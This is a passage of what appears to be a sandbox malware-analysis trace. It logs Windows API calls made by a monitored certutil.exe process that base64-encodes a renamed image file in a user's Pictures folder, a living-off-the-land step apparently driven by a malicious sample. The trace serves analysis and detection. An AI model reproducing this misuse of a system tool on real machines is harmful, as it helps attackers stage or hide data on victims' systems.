_ArgList=0x10d7ecf4b8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0301.360] GetFileType (hFile=0x50) returned 0x2 [0301.360] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x10d7ece460*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x10d7ece414, lpReserved=0x0 | out: lpBuffer=0x10d7ece460*, lpNumberOfCharsWritten=0x10d7ece414*=0x31) returned 1 [0301.360] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.361] _vsnwprintf (in: _Buffer=0x10d7ece460, _BufferCount=0x1ff, _Format="\n", _ArgList=0x10d7ecf4b8 | out: _Buffer="\n") returned 1 [0301.361] GetFileType (hFile=0x50) returned 0x2 [0301.361] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x10d7ece460*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x10d7ece414, lpReserved=0x0 | out: lpBuffer=0x10d7ece460*, lpNumberOfCharsWritten=0x10d7ece414*=0x1) returned 1 [0301.384] LocalFree (hMem=0x0) returned 0x0 [0301.384] LocalFree (hMem=0x11733b24440) returned 0x0 [0301.384] LocalFree (hMem=0x11733b26330) returned 0x0 [0301.384] SetLastError (dwErrCode=0x80070716) [0301.384] _vsnwprintf (in: _Buffer=0x10d7ecf4e8, _BufferCount=0xb, _Format="%d", _ArgList=0x10d7ecf4d8 | out: _Buffer="511") returned 3 [0301.384] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x10d7ecf2a0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0301.384] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x11733b48a40 [0301.385] PostQuitMessage (nExitCode=0) [0301.400] GetMessageW (in: lpMsg=0x10d7ecfae0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x10d7ecfae0) returned 0 [0301.400] LocalFree (hMem=0x11733b3bb80) returned 0x0 [0301.400] LocalFree (hMem=0x11733b48800) returned 0x0 [0301.400] LocalFree (hMem=0x0) returned 0x0 [0301.401] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0301.401] GetLastError () returned 0x7e [0301.401] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0301.402] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0301.402] DllMain () returned 0x1 [0301.402] LocalFree (hMem=0x11733b3baa0) returned 0x0 [0301.402] LocalFree (hMem=0x11733b2c430) returned 0x0 [0301.402] LocalFree (hMem=0x11733b486b0) returned 0x0 [0301.402] LocalFree (hMem=0x11733b48dd0) returned 0x0 [0301.402] LocalFree (hMem=0x11733b29f90) returned 0x0 [0301.402] LocalFree (hMem=0x11733b48a40) returned 0x0 [0301.402] LocalFree (hMem=0x11733b33f20) returned 0x0 [0301.402] LocalFree (hMem=0x11733b2c340) returned 0x0 [0301.402] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0301.402] GetLastError () returned 0x7e [0301.403] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0301.403] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0301.403] DllMain () returned 0x1 [0301.403] exit (_Code=0) Thread: id = 132 os_tid = 0x127c Process: id = "53" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x1deae000" os_pid = "0x11f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"RPjY4uqao.bmp.Sister\" \"RPjY4uqao.bmp.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 133 os_tid = 0x2d4 [0301.933] GetStartupInfoW (in: lpStartupInfo=0x971b1efa10 | out: lpStartupInfo=0x971b1efa10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"RPjY4uqao.bmp.Sister\" \"RPjY4uqao.bmp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0301.933] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0301.933] __set_app_type (_Type=0x1) [0301.933] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0301.934] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0301.937] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0301.937] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0301.937] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0301.938] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0301.938] WerSetFlags () returned 0x0 [0301.938] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0301.938] __iob_func () returned 0x7ffcea2dea00 [0301.938] _fileno (_File=0x7ffcea2dea30) returned 1 [0301.938] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0301.939] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0301.940] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0301.940] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0301.940] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0301.941] GetConsoleOutputCP () returned 0x1b5 [0301.942] _vsnwprintf (in: _Buffer=0x971b1ef980, _BufferCount=0xb, _Format=".%d", _ArgList=0x971b1ef8a8 | out: _Buffer=".437") returned 4 [0301.942] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0301.942] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0301.942] GetFileType (hFile=0x50) returned 0x2 [0301.943] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0301.943] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0301.943] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.944] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0301.944] GetCommandLineW () returned="certutil -encode \"RPjY4uqao.bmp.Sister\" \"RPjY4uqao.bmp.Cruel\"" [0301.944] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1eff434e300 [0301.944] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1eff4355ad0 [0301.944] LocalFree (hMem=0x1eff434e300) returned 0x0 [0301.944] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1eff4355d10 [0301.944] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x1eff4355b60 [0301.944] LocalFree (hMem=0x1eff4355d10) returned 0x0 [0301.944] LocalFree (hMem=0x1eff4355ad0) returned 0x0 [0301.944] LocalFree (hMem=0x0) returned 0x0 [0301.945] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0301.945] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0301.946] GetCommandLineW () returned="certutil -encode \"RPjY4uqao.bmp.Sister\" \"RPjY4uqao.bmp.Cruel\"" [0301.946] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x1eff434e3a0 [0301.946] GetSystemTime (in: lpSystemTime=0x971b1ef670 | out: lpSystemTime=0x971b1ef670*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0x10, wMilliseconds=0x1e6)) [0301.946] SystemTimeToFileTime (in: lpSystemTime=0x971b1ef670, lpFileTime=0x971b1ef668 | out: lpFileTime=0x971b1ef668) returned 1 [0301.946] FileTimeToLocalFileTime (in: lpFileTime=0x971b1ef668, lpLocalFileTime=0x971b1ef630 | out: lpLocalFileTime=0x971b1ef630) returned 1 [0301.946] FileTimeToSystemTime (in: lpFileTime=0x971b1ef630, lpSystemTime=0x971b1ef3a0 | out: lpSystemTime=0x971b1ef3a0) returned 1 [0301.946] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0x971b1ef3a0, lpFormat=0x0, lpDateStr=0x971b1ef4b0, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0301.946] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0x971b1ef3a0, lpFormat=0x0, lpTimeStr=0x971b1ef3b0, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0301.946] _vsnwprintf (in: _Buffer=0x971b1ef3be, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0x971b1ef388 | out: _Buffer=" 16.486s") returned 8 [0301.946] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x1eff4350fb0 [0301.946] SetLastError (dwErrCode=0x80070716) [0301.946] _vsnwprintf (in: _Buffer=0x971b1ef438, _BufferCount=0xb, _Format="%d", _ArgList=0x971b1ef428 | out: _Buffer="948") returned 3 [0301.947] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0x971b1ef1f0, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0301.947] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x1eff434e160 [0301.947] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x1eff4342d60 [0301.947] LocalFree (hMem=0x1eff4350fb0) returned 0x0 [0301.947] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x971b1ef6e0 | out: lpSystemTimeAsFileTime=0x971b1ef6e0*(dwLowDateTime=0xde955544, dwHighDateTime=0x1d6141f)) [0301.947] GetLocalTime (in: lpSystemTime=0x971b1ef718 | out: lpSystemTime=0x971b1ef718*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0x10, wMilliseconds=0x1e7)) [0301.947] SystemTimeToFileTime (in: lpSystemTime=0x971b1ef718, lpFileTime=0x971b1ef6f0 | out: lpFileTime=0x971b1ef6f0) returned 1 [0301.947] CompareFileTime (lpFileTime1=0x971b1ef6f0, lpFileTime2=0x971b1ef6e0) returned 1 [0301.947] _vsnwprintf (in: _Buffer=0x971b1ef728, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0x971b1ef6b8 | out: _Buffer="GMT + 2.00") returned 10 [0301.953] LocalFree (hMem=0x1eff434e3a0) returned 0x0 [0301.953] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0301.953] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0301.954] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0301.954] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0301.954] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0301.954] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0x971b1ef758 | out: _Buffer="10.0.15063.447") returned 14 [0301.954] GetACP () returned 0x4e4 [0301.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0301.954] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1eff434de00 [0301.954] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1eff434de00, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0301.954] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1eff4350f30 [0301.954] _vsnwprintf (in: _Buffer=0x1eff4350f30, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x971b1ef7a8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0301.954] LocalFree (hMem=0x1eff434de00) returned 0x0 [0301.954] LocalFree (hMem=0x0) returned 0x0 [0301.955] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0301.955] GetACP () returned 0x4e4 [0301.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0301.955] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1eff434e2c0 [0301.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1eff434e2c0, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0301.955] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1eff4350e70 [0301.955] _vsnwprintf (in: _Buffer=0x1eff4350e70, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x971b1ef7a8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0301.955] LocalFree (hMem=0x1eff434e2c0) returned 0x0 [0301.955] LocalFree (hMem=0x0) returned 0x0 [0301.955] GetACP () returned 0x4e4 [0301.955] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0301.955] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1eff434df40 [0301.956] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x1eff434df40, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0301.956] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1eff4350d30 [0301.956] _vsnwprintf (in: _Buffer=0x1eff4350d30, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0x971b1ef7d8 | out: _Buffer="10.0.15063.447 retail") returned 21 [0301.956] LocalFree (hMem=0x1eff434df40) returned 0x0 [0301.956] LocalFree (hMem=0x1eff4350f30) returned 0x0 [0301.956] LocalFree (hMem=0x1eff4350e70) returned 0x0 [0301.956] LocalFree (hMem=0x1eff4350d30) returned 0x0 [0301.956] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0301.956] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0301.956] GetStockObject (i=0) returned 0x900010 [0301.956] RegisterClassW (lpWndClass=0x971b1ef900) returned 0xc1a2 [0301.957] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2902c8 [0301.984] NtdllDefWindowProc_W () returned 0x0 [0301.985] NtdllDefWindowProc_W () returned 0x1 [0301.992] NtdllDefWindowProc_W () returned 0x0 [0302.004] UpdateWindow (hWnd=0x2902c8) returned 1 [0302.004] PostMessageW (hWnd=0x2902c8, Msg=0x400, wParam=0x0, lParam=0x1eff433217e) returned 1 [0302.004] GetMessageW (in: lpMsg=0x971b1ef950, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x971b1ef950) returned 1 [0302.004] TranslateMessage (lpMsg=0x971b1ef950) returned 0 [0302.004] DispatchMessageW (lpMsg=0x971b1ef950) returned 0x0 [0302.005] NtdllDefWindowProc_W () returned 0x0 [0302.005] GetMessageW (in: lpMsg=0x971b1ef950, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x971b1ef950) returned 1 [0302.005] TranslateMessage (lpMsg=0x971b1ef950) returned 0 [0302.005] DispatchMessageW (lpMsg=0x971b1ef950) returned 0x0 [0302.005] LocalAlloc (uFlags=0x0, uBytes=0x6a) returned 0x1eff43343e0 [0302.005] LocalAlloc (uFlags=0x0, uBytes=0x76) returned 0x1eff4338520 [0302.005] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0302.005] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0302.005] SetLastError (dwErrCode=0x80070716) [0302.005] _vsnwprintf (in: _Buffer=0x971b1ef358, _BufferCount=0xb, _Format="%d", _ArgList=0x971b1ef348 | out: _Buffer="465") returned 3 [0302.005] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0x971b1ef110, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0302.005] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x1eff4355620 [0302.006] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0302.006] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0302.006] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0x971b1ef0f0, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0302.006] GetLastError () returned 0xcb [0302.006] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0302.006] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0302.006] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0302.006] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0302.006] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0302.006] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0302.006] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0302.007] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0302.007] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0302.007] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0302.007] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0302.007] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0302.007] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0302.007] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0302.007] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0302.007] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0302.007] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0302.007] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0302.007] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0302.007] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0302.008] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0302.008] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0x971b1eedb8 | out: phkResult=0x971b1eedb8*=0x23c) returned 0x0 [0302.008] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x1eff4339350 [0302.008] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0x971b1ef328, lpData=0x971b1ef358, lpcbData=0x971b1ef320*=0x4 | out: lpType=0x971b1ef328*=0x0, lpData=0x971b1ef358*=0x0, lpcbData=0x971b1ef320*=0x4) returned 0x2 [0302.008] LocalFree (hMem=0x1eff4339350) returned 0x0 [0302.009] RegCloseKey (hKey=0x23c) returned 0x0 [0302.009] LocalFree (hMem=0x0) returned 0x0 [0302.009] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x1eff435cca0 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0302.060] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decodehex", cchCount2=-1) returned 3 [0302.060] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encodehex", cchCount2=-1) returned 1 [0302.061] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="decode", cchCount2=-1) returned 3 [0302.061] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="encode", cchCount2=-1) returned 2 [0302.061] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x1eff4361800 [0302.061] GetComputerNameW (in: lpBuffer=0x1eff4361800, nSize=0x971b1ef320 | out: lpBuffer="NQDPDE", nSize=0x971b1ef320) returned 1 [0302.061] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x0, nSize=0x971b1ef2f0 | out: lpBuffer=0x0, nSize=0x971b1ef2f0) returned 0 [0302.061] GetLastError () returned 0xea [0302.061] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x1eff434e2e0 [0302.061] GetComputerNameExW (in: NameType=0x3, lpBuffer=0x1eff434e2e0, nSize=0x971b1ef2f0 | out: lpBuffer="NQdPdE", nSize=0x971b1ef2f0) returned 1 [0302.062] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0302.064] CertCreateCertificateContext (dwCertEncodingType=0x1, pbCertEncoded=0x1eff4361de0, cbCertEncoded=0x4df6) returned 0x0 [0302.067] CertCreateCRLContext (dwCertEncodingType=0x1, pbCrlEncoded=0x1eff4361de0, cbCrlEncoded=0x4df6) returned 0x0 [0302.068] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x4, pbEncoded=0x1eff4361de0, cbEncoded=0x4df6, dwFlags=0x8000, pDecodePara=0x971b1ef1d0, pvStructInfo=0x971b1ef260, pcbStructInfo=0x971b1ef254 | out: pvStructInfo=0x971b1ef260, pcbStructInfo=0x971b1ef254) returned 0 [0302.068] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x15, pbEncoded=0x1eff4361de0, cbEncoded=0x4df6, dwFlags=0x8000, pDecodePara=0x971b1ef1d0, pvStructInfo=0x971b1ef260, pcbStructInfo=0x971b1ef254 | out: pvStructInfo=0x971b1ef260, pcbStructInfo=0x971b1ef254) returned 0 [0302.068] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x3b, pbEncoded=0x1eff4361de0, cbEncoded=0x4df6, dwFlags=0x8000, pDecodePara=0x971b1ef1d0, pvStructInfo=0x971b1ef260, pcbStructInfo=0x971b1ef254 | out: pvStructInfo=0x971b1ef260, pcbStructInfo=0x971b1ef254) returned 0 [0302.068] CryptMsgOpenToDecode (dwMsgEncodingType=0x10001, dwFlags=0x0, dwMsgType=0x0, hCryptProv=0x0, pRecipientInfo=0x0, pStreamInfo=0x0) returned 0x1eff433c240 [0302.077] CryptMsgUpdate (hCryptMsg=0x1eff433c240, pbData=0x1eff4361de0, cbData=0x4df6, fFinal=1) returned 0 [0302.077] GetLastError () returned 0x8009310b [0302.077] CryptMsgClose (hCryptMsg=0x1eff433c240) returned 1 [0302.078] GetFileAttributesExW (in: lpFileName="RPjY4uqao.bmp.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\rpjy4uqao.bmp.sister"), fInfoLevelId=0x0, lpFileInformation=0x971b1ef280 | out: lpFileInformation=0x971b1ef280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x117c9d60, ftCreationTime.dwHighDateTime=0x1d5e33c, ftLastAccessTime.dwLowDateTime=0x43c0f840, ftLastAccessTime.dwHighDateTime=0x1d5ecea, ftLastWriteTime.dwLowDateTime=0x43c0f840, ftLastWriteTime.dwHighDateTime=0x1d5ecea, nFileSizeHigh=0x0, nFileSizeLow=0x4df6)) returned 1 [0302.078] _vsnwprintf (in: _Buffer=0x971b1ef288, _BufferCount=0xb, _Format="%d", _ArgList=0x971b1ef278 | out: _Buffer="359") returned 3 [0302.078] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x971b1ef040, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0302.078] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1eff43616e0 [0302.078] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.078] _vsnwprintf (in: _Buffer=0x971b1ee270, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x971b1ef2c8 | out: _Buffer="Input Length = 19958") returned 20 [0302.078] GetFileType (hFile=0x50) returned 0x2 [0302.078] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x971b1ee270*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x971b1ee224, lpReserved=0x0 | out: lpBuffer=0x971b1ee270*, lpNumberOfCharsWritten=0x971b1ee224*=0x14) returned 1 [0302.082] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.082] _vsnwprintf (in: _Buffer=0x971b1ee270, _BufferCount=0x1ff, _Format="\n", _ArgList=0x971b1ef2c8 | out: _Buffer="\n") returned 1 [0302.082] GetFileType (hFile=0x50) returned 0x2 [0302.082] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x971b1ee270*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x971b1ee224, lpReserved=0x0 | out: lpBuffer=0x971b1ee270*, lpNumberOfCharsWritten=0x971b1ee224*=0x1) returned 1 [0302.158] GetFileAttributesExW (in: lpFileName="RPjY4uqao.bmp.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\rpjy4uqao.bmp.cruel"), fInfoLevelId=0x0, lpFileInformation=0x971b1ef280 | out: lpFileInformation=0x971b1ef280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeaad829, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xdeaad829, 